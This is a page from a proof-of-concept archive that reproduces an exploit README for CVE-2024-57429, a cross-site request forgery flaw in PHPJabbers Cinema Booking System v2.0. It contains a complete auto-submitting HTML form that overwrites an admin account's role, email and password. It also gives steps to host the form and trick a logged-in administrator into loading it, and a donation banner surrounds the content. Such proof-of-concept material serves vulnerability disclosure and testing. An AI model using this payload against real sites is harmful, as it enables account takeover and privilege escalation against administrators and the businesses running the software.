Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-57429 PoC — PHPJabbers Cinema Booking System 安全漏洞

Source
Associated Vulnerability
Title:PHPJabbers Cinema Booking System 安全漏洞 (CVE-2024-57429)
Description:PHPJabbers Cinema Booking System是PHPJabbers公司的一个影院预订系统。 PHPJabbers Cinema Booking System v2.0版本存在安全漏洞,该漏洞源于pjActionUpdate函数中包含一个跨站请求伪造漏洞。
Description
CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 is vulnerable to CSRF, allowing attackers to escalate privileges by forging requests on behalf of an admin.  
Readme
# CVE-2024-57429
A cross-site request forgery (CSRF) vulnerability in the pjActionUpdate function of PHPJabbers Cinema Booking System v2.0 allows remote attackers to escalate privileges by tricking an authenticated admin into submitting an unauthorized request.

## Impact:
Exploitation of this CSRF vulnerability can lead to unauthorized actions, such as:
- Changing the admin's password, effectively locking them out.
- Elevating the attacker's privileges to admin by updating their user role.

## Exploit - Proof of Concept (POC)
### Cross-Site Request Forgery (CSRF)

### poc.html

```
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="attacker@example.com" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
```

1. Save the above code as poc.html
2. Host the file on a server and trick the admin into accessing it while logged into the application.
3. The admin's account will be updated with the attacker's details and new password.
File Snapshot

[4.0K] /data/pocs/75c4a53fe1535aa943936486b125f930b83b6389 └── [1.6K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.